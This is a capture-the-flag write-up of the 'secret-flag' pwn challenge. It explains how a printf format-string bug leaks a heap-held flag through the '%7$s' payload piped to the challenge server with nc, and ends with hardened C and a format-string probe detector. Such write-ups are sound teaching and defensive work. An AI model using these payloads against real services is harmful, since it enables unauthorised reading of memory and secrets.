# (solved) pwn/secret-flag

There's a super secret flag in printf that allows you to LEAK the data at an address??

```
nc 2020.redpwnc.tf 31826
```

```bash
# checksec secret-flag
[*] '/root/redpwn/secret-flag/secret-flag'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
```

Ghidra decompilation of the main function:

```c
undefined8 FUN_0010091a(void)
{
  int __fd;
  void *__buf;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);   // stack canary
  __buf = malloc(0x100);                       // flag is read into a heap buffer
  __fd = open("flag.txt",0);
  read(__fd,__buf,0x100);
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("I have a secret flag, which you'll never get!");
  puts("What is your name, young adventurer?");
  fgets(local_28,0x14,stdin);
  printf("Hello there: ");
  printf(local_28);                            // user input used as the format string
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
```

So leak the file descriptor somehow? The flag is read into the `malloc`'d buffer and never printed; the only thing we control is the name passed straight to `printf(local_28)` as the format string.

Dumping stack slots with `%p` gave mostly environment data:

```text
environment leak
����\x7f �^\x1aW� \x00/\x11 \xa25\x84( �qKiKp\x0e\xaf \xa2x86_64 ES_SERVI 999_TCP_ ERVICE_P IN_PORT_ BERNETES \x00MAIN_PO MAIN_SER 1.100:99 ST=10.0. _SERVICE al/sbin: =9999\x00MA ADDR=10. CE_PORT= /usr/loc CE_PORT= 443\x00HOST 0.142.0. n-f7445c ES_SERVI T=443\x00KU root\x00MAI :/usr/bi 443\x00HOST _PORT_HT //10.0.1 BERNETES 0.11.100 root\x00MAI et-flag //10.0.1 //10.0.1 MAIN_SER //10.0.1 RT_9999_ ://10.0. \x00MAIN_PO \x00\x00\x00\x00\x00\x00\x00. VICE_HOS /secret-
```

So dumb: the flag buffer was referenced from the stack, but since that variable is a pointer into the heap, the stack slot only holds the address, not the flag bytes. So I had to use `%7$s` instead of `%7$p` to dereference it:

```bash
echo '%7$s'|nc 2020.redpwnc.tf 31826
I have a secret flag, which you'll never get!
What is your name, young adventurer?
Hello there: flag{n0t_s0_s3cr3t_f1ag_n0w}
```
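From the defender's side, the root cause is `printf(local_28)`: the user's name becomes the format string, so `%7$s` reads the seventh variadic slot and dereferences it. The C below is an added example, not the challenge's code: `greet_safe` is the hardened form of the greeting (constant format string, input passed as an argument) and `looks_like_format_probe` is a small input check a service could log on; both function names and the sample input are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example (not the challenge binary). The challenge did:
 *
 *     printf(local_28);          // user input *is* the format string
 *
 * which gcc/clang report with -Wformat -Wformat-security. The hardened
 * form keeps the format string constant and passes the input as an
 * argument, so a "%7$s" in the name is printed literally instead of
 * being interpreted as a conversion.
 */

/* Hardened greeting: writes "Hello there: <name>" into out. Returns the
 * snprintf result (number of characters that would have been written). */
int greet_safe(const char *name, char *out, size_t out_len)
{
    return snprintf(out, out_len, "Hello there: %s", name);
}

/* Detection helper (constructed for this example): returns 1 if the input
 * contains something that looks like a printf conversion, e.g. "%p",
 * "%7$s" or "%08lx". "%%" (a literal percent) and a bare trailing "%"
 * do not count. Useful as a log/alert signal, not as a substitute for
 * fixing the format string. */
int looks_like_format_probe(const char *s)
{
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        p++;                                      /* character after '%' */
        if (*p == '%') { p++; continue; }         /* "%%" is a literal percent sign */
        while (*p >= '0' && *p <= '9') p++;       /* positional index or field width */
        if (*p == '$') p++;                       /* "%7$..." positional form */
        while (*p != '\0' && strchr("lhqjzt", *p) != NULL) p++; /* length modifiers */
        if (*p == '\0') break;                    /* dangling '%' at end of input */
        if (strchr("spnxXdiuc", *p) != NULL) return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed input: the same payload used against the challenge. */
    const char *name = "%7$s";
    char out[64];

    if (looks_like_format_probe(name))
        fprintf(stderr, "warning: format-string probe in input: %s\n", name);

    greet_safe(name, out, sizeof out);
    puts(out);   /* prints "Hello there: %7$s"; nothing is dereferenced */
    return 0;
}
```

The detection helper is deliberately loose (it only recognises the common conversion characters) because its job is to raise a signal in logs; the real fix is the constant format string in `greet_safe`, which removes the bug class entirely rather than filtering inputs.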